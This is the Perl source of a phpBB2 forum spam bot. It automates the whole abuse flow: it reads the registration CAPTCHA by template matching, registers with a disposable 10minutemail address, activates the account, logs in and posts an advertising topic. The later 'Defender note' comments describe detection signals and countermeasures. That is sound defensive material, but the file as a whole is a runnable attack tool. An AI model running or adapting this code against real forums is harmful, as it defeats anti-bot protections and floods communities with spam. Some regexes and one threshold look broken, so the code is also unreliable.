Code:
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# - -
# + phpBB2 Spam Bot +
# - Author: darkjoker -
# + Site : http://darkjoker.net23.net +
# - Usage : perl bot.pl <configuration_file> -
# + Configuration File Syntax: +
# - URL: http://victim_host/phpBB2_path -
# + Username: Spam_bot_nick +
# - Site: http://spam.com -
# + Subject: Post's subject +
# - Message on -
# + more lines +
# - -
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
sub banner
{
    # Prints the fixed credits/usage box to STDOUT. The text is the same
    # box that opens the file as a comment; nothing here depends on input.
    my @rows = (
        "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+",
        "- -",
        "+ phpBB2 Spam Bot +",
        "- Author: darkjoker -",
        "+ Site : http://darkjoker.net23.net +",
        "- Usage : perl bot.pl <configuration_file> -",
        "+ Configuration File Syntax: +",
        "- URL: http://victim_host/phpBB2_path -",
        "+ Username: Spam_bot_nick +",
        "- Site: http://spam.com -",
        "+ Subject: Post's subject +",
        "- Message on -",
        "+ more lines +",
        "- -",
        "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+",
    );
    # Every row is preceded by a newline and the box is closed by a blank line.
    print join ("\n", "", @rows) . "\n\n";
}
sub message_die
{
    # Writes one "[!] ..." line to STDOUT and ends the process.
    # exit is called without a status, so the exit code is 0 even
    # though this is the error path.
    my ($message) = @_;
    my $line = "[!] ${message}\n";
    print $line;
    exit ();
}
sub get_values
{
    # Returns the 27-number reference profile stored for one character
    # (A-Z, 1-9). The caller compares these numbers row by row with counts
    # taken from the downloaded confirmation image, so the table is
    # specific to one fixed rendering of that glyph set.
    my ($chr) = @_;
    my %profile_of = (
        A => [13, 14, 14, 16, 16, 17, 18, 18, 19, 20, 20, 20, 20, 21, 20, 23, 24, 25, 25, 26, 26, 27, 27, 26, 20, 19, 18],
        B => [19, 21, 22, 22, 23, 23, 22, 18, 18, 21, 22, 21, 21, 22, 23, 23, 22, 18, 17, 18, 22, 23, 23, 23, 22, 21, 20],
        C => [13, 17, 20, 22, 23, 24, 24, 21, 19, 17, 12, 8, 8, 8, 8, 11, 16, 18, 20, 21, 23, 24, 23, 22, 21, 18, 15],
        D => [17, 19, 20, 21, 22, 23, 22, 20, 18, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 19, 22, 23, 22, 21, 20, 19, 18],
        E => [20, 21, 21, 21, 21, 21, 19, 8, 8, 17, 20, 21, 21, 21, 21, 21, 19, 8, 8, 8, 17, 21, 21, 21, 21, 21, 21],
        F => [18, 19, 19, 19, 19, 19, 18, 8, 8, 15, 17, 18, 18, 18, 18, 18, 16, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8],
        G => [16, 19, 21, 23, 25, 25, 25, 22, 18, 13, 9, 18, 21, 22, 22, 22, 23, 22, 22, 21, 25, 26, 25, 24, 24, 20, 17],
        H => [16, 17, 17, 17, 17, 17, 17, 17, 22, 24, 24, 24, 24, 24, 24, 24, 23, 17, 17, 17, 17, 17, 17, 17, 17, 17, 16],
        I => [16, 17, 17, 17, 17, 17, 17, 16, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 15, 17, 17, 17, 17, 17],
        J => [ 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 14, 16, 18, 18, 20, 20, 20, 19, 18, 16, 13],
        K => [19, 21, 21, 22, 21, 22, 22, 21, 20, 19, 19, 19, 19, 20, 21, 21, 22, 22, 21, 20, 19, 19, 19, 19, 19, 18, 18],
        L => [ 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 16, 18, 19, 19, 19, 19, 19, 19],
        M => [24, 25, 25, 25, 26, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 27, 27, 27, 27, 27, 25, 25, 25, 25, 25, 23],
        N => [15, 16, 17, 17, 18, 19, 20, 21, 21, 22, 23, 23, 24, 24, 24, 23, 23, 22, 21, 21, 20, 19, 18, 18, 17, 16, 15],
        O => [14, 19, 21, 23, 24, 25, 25, 23, 20, 19, 18, 17, 17, 17, 17, 18, 18, 19, 20, 23, 25, 25, 24, 24, 22, 19, 15],
        P => [18, 19, 20, 21, 21, 21, 21, 18, 17, 17, 18, 20, 21, 21, 21, 20, 19, 18, 15, 8, 8, 8, 8, 8, 8, 8, 8],
        Q => [14, 18, 21, 23, 24, 25, 25, 24, 20, 19, 19, 18, 17, 17, 17, 20, 24, 25, 26, 26, 26, 25, 25, 25, 25, 24, 22],
        R => [20, 22, 23, 23, 24, 24, 23, 19, 19, 23, 24, 23, 22, 22, 20, 20, 20, 21, 19, 19, 19, 19, 19, 19, 19, 18, 17],
        S => [15, 18, 20, 21, 22, 23, 22, 20, 18, 15, 18, 20, 21, 20, 20, 18, 20, 19, 18, 20, 22, 23, 23, 22, 20, 19, 16],
        T => [22, 23, 23, 23, 23, 23, 21, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9],
        U => [16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 21, 23, 24, 23, 22, 21, 19, 15],
        V => [17, 18, 19, 20, 20, 21, 21, 20, 20, 21, 21, 20, 21, 21, 20, 20, 19, 18, 18, 17, 16, 16, 14, 14, 13, 12, 12],
        W => [27, 30, 30, 30, 32, 33, 34, 34, 34, 33, 33, 33, 33, 33, 32, 31, 31, 30, 28, 27, 27, 27, 26, 23, 23, 23, 22],
        X => [18, 20, 21, 21, 21, 21, 21, 20, 19, 18, 16, 16, 14, 14, 15, 16, 18, 19, 20, 22, 23, 22, 22, 22, 21, 19, 17],
        Y => [18, 20, 22, 22, 23, 23, 22, 21, 19, 19, 17, 17, 15, 13, 13, 11, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9],
        Z => [21, 22, 22, 22, 22, 22, 20, 13, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 11, 11, 19, 22, 22, 22, 22, 22, 22],
        1 => [ 7, 8, 9, 10, 12, 13, 14, 14, 14, 14, 14, 13, 12, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7],
        2 => [13, 16, 18, 19, 20, 20, 19, 17, 17, 15, 9, 10, 12, 12, 12, 13, 13, 12, 12, 11, 17, 19, 20, 20, 20, 20, 20],
        3 => [14, 17, 18, 19, 20, 20, 18, 16, 15, 12, 12, 12, 12, 13, 13, 13, 11, 8, 12, 15, 18, 19, 20, 19, 19, 17, 13],
        4 => [ 9, 10, 11, 12, 13, 14, 14, 15, 16, 17, 18, 18, 17, 17, 16, 20, 22, 22, 22, 22, 22, 22, 20, 9, 9, 9, 8],
        5 => [18, 19, 19, 19, 20, 19, 18, 8, 14, 16, 18, 19, 19, 20, 20, 17, 12, 8, 12, 15, 17, 19, 20, 19, 18, 16, 13],
        6 => [12, 15, 17, 19, 19, 20, 17, 15, 13, 16, 18, 19, 20, 20, 20, 18, 16, 16, 16, 16, 18, 19, 20, 19, 19, 16, 14],
        7 => [19, 20, 20, 20, 20, 20, 19, 10, 10, 10, 10, 9, 10, 9, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 8],
        8 => [12, 15, 17, 19, 20, 20, 18, 16, 18, 19, 19, 18, 18, 19, 20, 20, 18, 16, 15, 16, 18, 20, 20, 20, 19, 18, 15],
        9 => [13, 16, 18, 19, 19, 20, 18, 16, 16, 16, 16, 18, 19, 20, 20, 20, 19, 18, 15, 14, 17, 19, 19, 19, 18, 15, 12],
    );
    return @{ $profile_of{$chr} };
}
# Start-up: print the banner, then load the run parameters from the file
# named by the first command-line argument.
banner ();
my $config_file = shift or message_die ("No configuration file specified.");
# NOTE(review): two-argument open with a bareword handle on a name taken
# from the command line, and the result is never checked. With this form
# Perl interprets mode characters that appear in the name itself.
open (CONFIG, "<${config_file}");
my @info = <CONFIG>;
# The first four lines are matched positionally: target forum URL (split
# into host and path), account name, advertised site, post subject.
$info [0] =~ /URL: http://(.+?)(/.+)/;
my ($host, $path) = ($1, $2);
$info [1] =~ /Username: (.+)/;
my $nick = $1;
$info [2] =~ /Site: (.+)/;
my $site = $1;
$info [3] =~ /Subject: (.+)/;
my $subject = $1;
# Drop those four lines; whatever remains is the post body.
shift (@info);
shift (@info);
shift (@info);
shift (@info);
my $message = join ("", @info);
# Any empty field aborts the run before a connection is opened.
message_die ("Configuration file uses a wrong syntax.") if ((!$host) || (!$path) || (!$nick) || (!$site) || (!$subject) || (!$message));
# Stage: request the registration form and download its confirmation image.
# Defender note: every request in this script is hand-written on a raw
# socket and carries only Host, Connection and (sometimes) Cookie headers.
# There is no User-Agent, Accept or Referer header, which makes the traffic
# easy to separate from browser sign-ups in web-server logs or a WAF rule.
# The image is written to a fixed file name in the current directory.
open (CAPATCHA, ">capatcha.png");
my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
) or message_die ($!);
# The form is requested with agreed=true already in the query string, so
# the terms page is never fetched first.
my $get = "GET ${path}/profile.php?mode=register&agreed=true HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n\r\n";
print $sock $get;
# The whole response (headers and body) is collected into one string.
my $reply;
while (<$sock>)
{
chomp ($_);
$reply .= $_;
}
close ($sock);
$reply =~ s/&/&/g;
# Values lifted from the response: the image id, the two phpbb2mysql_*
# cookies, and the hidden sid / confirm_id form fields.
$reply =~ /<img src="profile\.php\?mode=confirm&id=(.+?)"/;
my $img = "${path}/profile.php?mode=confirm&id=${1}";
$reply =~ /(phpbb2mysql_data=.+?);.+?(phpbb2mysql_sid=.+?);/;
my $cookie = "Cookie: ${1}; ${2}\r\n";
$reply =~ /<input type="hidden" name="sid" value="(.+?)" />/;
my $sid = $1;
$reply =~ /<input type="hidden" name="confirm_id" value="(.+?)" />/;
my $confirm_id = $1;
# Second request: the image itself, sent with the session cookies.
$get = "GET ${img} HTTP/1.1\r\n".
"Host: ${host}\r\n".
$cookie .
"Connection: Close\r\n\r\n";
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
print $sock $get;
# Response lines are discarded until one contains "PNG"; from that line on
# everything is written to the output file.
my $k = 0;
while (<$sock>)
{
$k = 1 if ($_ =~ /PNG/);
print CAPATCHA $_ if ($k);
}
close ($sock);
close (CAPATCHA);
print "[+] Capatcha image downloaded successfully.\n";
# Shells out to an external "convert" program (presumably ImageMagick) with
# fixed arguments to produce an uncompressed PPM. The exit status is not
# checked, and the status line below is printed regardless.
system ("convert -compress None capatcha.png capatcha.ppm");
print "[+] Capatcha image converted from PNG to PPM successfully.\n";
# Stage: read the converted image as text and derive a six-character code
# by comparing per-row counts with the fixed profiles from get_values().
# Defender note: the approach depends on properties of the image that are
# hard-coded below: a 320-sample row width, a 35-character glyph set, ink
# that separates from the background with a single threshold (<= 100) and
# characters that do not touch. A visual confirmation with those properties
# gives little protection by itself; pair it with sign-up rate limits and
# moderation of new accounts, or replace it.
my $code;
my @chars = qw {A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9};
# Tolerance applied to each of the 27 per-row comparisons.
my $limit = 15;
open (CAPATCHA, "<capatcha.ppm");
my @c = <CAPATCHA>;
# Skip the first three lines of the file (the PPM header, presumably).
shift (@c);
shift (@c);
shift (@c);
# Flatten the remaining whitespace-separated numbers into one list.
my @b;
while (@c)
{
my @shift = split (" ", shift (@c));
foreach my $tm (@shift)
{
push (@b, $tm);
}
}
# Keep the first of every three numbers (one channel per pixel, presumably)
# and lay them out as a grid $a[row][column], 320 columns per row.
my ($y, $x) = (0, 0);
my @a;
while (@b)
{
$a [$y] [$x] = shift (@b);
shift (@b);
shift (@b);
$x++;
if ($x == 320)
{
$y++;
$x = 0;
}
}
# Collect every column that has at least one sample <= 100 in rows 0..48.
$x = 0;
my @val;
while ($x < 320)
{
$y = 0;
$k = 0;
while ($y < 49)
{
$k = 1 if ($a [$y] [$x] <= 100);
$y++;
}
push (@val, $x) if ($k);
$x++;
}
# Group consecutive columns into runs. For each run, record its first and
# last column plus a vertical window that starts at the first row found
# with a sample <= 100 and spans 27 rows.
my @coords;
while (@val)
{
my ($min, $max) = (shift (@val), 0);
my $tm = 0;
while (1)
{
$max = shift (@val);
$max = 0 if (!$max);
if (($max != $tm+1) && ($tm))
{
$max = $tm;
last;
}
$tm = $max;
}
$tm = $min;
my ($n, $min_y, $max_y) = (0, 0, 0);
while ($n < 50)
{
$min = $tm;
while ($min < $max)
{
if (($a [$n] [$min] <= 100) && (!$min_y))
{
$min_y = $n;
$max_y = $min_y+27;
}
$min++;
}
$n++;
}
$min = $tm;
push (@coords, $min);
push (@coords, $max);
push (@coords, $min_y);
push (@coords, $max_y);
}
close (CAPATCHA);
# Exactly six windows are consumed, one per character of the code.
my $cnt = 1;
while ($cnt <= 6)
{
my @tmp;
my $min_x = shift (@coords);
my $max_x = shift (@coords);
my $min_y = shift (@coords);
my $max_y = shift (@coords);
my $tm_x = $min_x;
my $n = 0;
# $tmp[$n] becomes a per-row count over the window; a position is counted
# when it or one of its eight neighbours passes the threshold test.
while ($min_y < $max_y)
{
$min_x = $tm_x;
while ($min_x < $max_x)
{
$tmp [$n]++ if (($a [$min_y-1] [$min_x-1] <= 100) || ($a [$min_y-1] [$min_x] <= 100) || ($a [$min_y-1] [$min_x+1] <= 100) || ($a [$min_y] [$min_x-1] <= 100) || ($a [$min_y] [$min_x] <= 100) || ($a [$min_y] [$min_x+1] <= 100) || ($a [$min_y+1] [$min_x-1] <= 100) || ($a [$min_y+1] [$min_x] <= 00) || ($a [$min_y+1] [$min_x+1] <= 100));
$min_x++;
}
$min_y++;
$n++;
}
# A candidate character is accepted when all 27 row counts fall strictly
# inside its stored profile +/- $limit.
my $end;
foreach my $char (@chars)
{
@val = get_values ($char);
$k = 1;
$n = 0;
while ($n < 27)
{
$k = 0 if (!(($tmp [$n] < $val [$n]+$limit) && ($tmp [$n] > $val [$n]-$limit)));
$n++;
}
if ($k)
{
if (!$end)
{
$end = $char;
}
else
{
# More than one candidate passed: compare summed absolute differences of
# the new candidate and the one already held.
my ($err_crt, $err_prc) = 0;
$n = 0;
my @vals = get_values ($end);
while ($n < 27)
{
$err_crt += abs ($tmp [$n]-$val [$n]);
$err_prc += abs ($tmp [$n]-$vals [$n]);
$n++;
}
$end = $char if ($err_crt < $err_prc);
}
}
}
$cnt++;
$code .= $end;
}
print "[+] Capatcha's code read successfully: ${code}\n";
# Stage: obtain a throw-away mailbox from a public disposable-mail service.
# Defender note: the registration address comes from a disposable-mail
# domain, so refusing such domains at sign-up (or holding those accounts
# for manual approval) stops the flow at this point. E-mail activation by
# itself does not, because the script reads the mailbox in a later stage.
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp"
) or message_die ("10 Minute Mail's service is not disponible. Please try again later.");
$get = "GET /10MinuteMail/index.html HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
"Connection: Close\r\n\r\n";
print $sock $get;
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
# The assigned address is read from the page's form field; the JSESSIONID
# cookie is kept so later requests refer to the same mailbox.
$reply =~ /name="addyForm:addressSelect" value="(.+?)" size="30"/;
my $email = $1;
$reply =~ /(JSESSIONID=.+?);/;
my $mail_cookie = "Cookie: ${1}\r\n";
print "[+] New email address has been created successfully: ${email}\n";
# Stage: submit the registration form.
# Defender note: the sign-up is recognisable from the request body alone.
# It fills the optional website field with the advertised site, uses the
# literal password "PASSWORD", and arrives on a connection that is closed
# without reading the reply. A populated website field at registration is a
# useful scoring signal for anti-spam rules.
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
);
my $post = "username=${nick}&email=${email}&new_password=PASSWORD&password_confirm=PASSWORD&confirm_code=${code}&website=${site}&mode=register&agreed=true&coppa=0&sid=${sid}&confirm_id=${confirm_id}&submit=Send";
$get = "POST ${path}/profile.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
$cookie.
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: " . length ($post) . "\r\n\r\n".
$post;
print $sock $get;
# The response is not read; the success line below is printed regardless
# of what the server answered.
close ($sock);
my $seconds = 60; # Edit this value to increase/decrease the stand-by time
print "[+] ${nick} has been registered successfully!\n".
"[+] Waiting ${seconds} seconds to receive the email from ${host}...\n";
# Fixed pause before the mailbox is polled.
sleep ($seconds);
# Stage: read the activation mail from the disposable mailbox and request
# the activation link on the forum.
# Defender note: the activation URL is fetched within about a minute of
# registration, on a connection with no cookies and no browser headers. A
# short registration-to-activation interval combined with a disposable
# address is a strong indicator of automation.
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp",
);
# 1) Mailbox index, using the session cookie captured earlier.
$get = "GET /10MinuteMail/index.html HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
$mail_cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
$reply =~ s/&/&/g;
$reply =~ /<td><a href="(\/10MinuteMail\/index\.html\?dataModelSelection=.+?)".+?</a>/;
my $link = $1;
# 2) Follow the message-selection link found in the index page.
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${link} HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
$mail_cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
# 3) The answer is expected to carry a Location header pointing at the
# message view; that path is requested next.
$reply =~ /Location: http://10minutemail.com(/10MinuteMail/read.html?cid=[0-9]{1,})/;
$link = $1;
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${link} HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
$mail_cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
# NOTE(review): this socket is not closed before $sock is reassigned below.
# 4) Pull the link that points back at the forum host out of the mail body.
# $host is interpolated into the pattern as-is.
$link = "";
$reply =~ /<br />http://$host(.+?)<br />/;
$link = $1;
$link =~ s/&/&/g;
# The activation request is sent only when a link was found; the reply is
# not read.
if ($link)
{
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${link} HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n\r\n";
print $sock $get;
close ($sock);
}
# Stage: log in with the account just created and capture the new session
# cookies.
# Defender note: the login uses the same literal password as the
# registration and arrives immediately after the activation request, with
# no cookies and no browser headers.
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
);
$post = "username=${nick}&password=PASSWORD&login=Log+in";
$get = "POST ${path}/login.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
"Content-Length: " . length ($post) . "\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n\r\n".
$post;
print $sock $get;
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
# Session cookies are taken from the collected response text.
$reply =~ /(phpbb2mysql_data=.+?);.+(phpbb2mysql_sid=.+?);/;
$cookie = "Cookie: ${1}; ${2}\r\n";
# Printed unconditionally; the response is not inspected for a login error.
print "[+] Logged in successfully.\n";
# Stage: list the forums on the index page, pick one at random, submit a
# new topic, then delete the two temporary image files.
# Defender note: the first post follows registration by little more than
# the fixed wait, is a new topic in an arbitrary forum, and comes from an
# account whose profile already carries the advertised site. Holding first
# posts from new accounts for moderation, or enforcing a minimum account
# age before posting, blocks this stage even when the earlier ones succeed.
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${path}/index.php HTTP/1.1\r\n".
"Host: $host\r\n".
$cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
# Forum ids are collected by repeatedly matching a viewforum link and then
# deleting that match from the text.
my @forums;
while ($reply =~ /viewforum.php?f=([1-9]{1,})/)
{
push (@forums, $1);
$reply =~ s/viewforum.php?f=([1-9]{1,})//;
}
# One collected id is chosen at random.
my $id = $forums [int (rand (scalar (@forums)))];
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
);
# The session id sent in the form is the 32-hex-digit value inside the
# cookie header built at login.
$cookie =~ /sid=([a-f0-9]{32})/;
$sid = $1;
$post = "subject=${subject}&message=${message}&sid=${sid}&mode=newtopic&f=${id}&post=Send";
$get = "POST ${path}/posting.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
$cookie.
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: " . length ($post) . "\r\n\r\n".
$post;
print $sock $get;
# The reply is not read, so the message below does not reflect the
# server's answer.
close ($sock);
print "[+] The topic has been posted successfully.\n".
"[+] Removing temporary files...\n";
# Host-side artefacts: both image files are removed at the end of the run.
unlink ("capatcha.png");
unlink ("capatcha.ppm");
print "[+] Done.\n"; |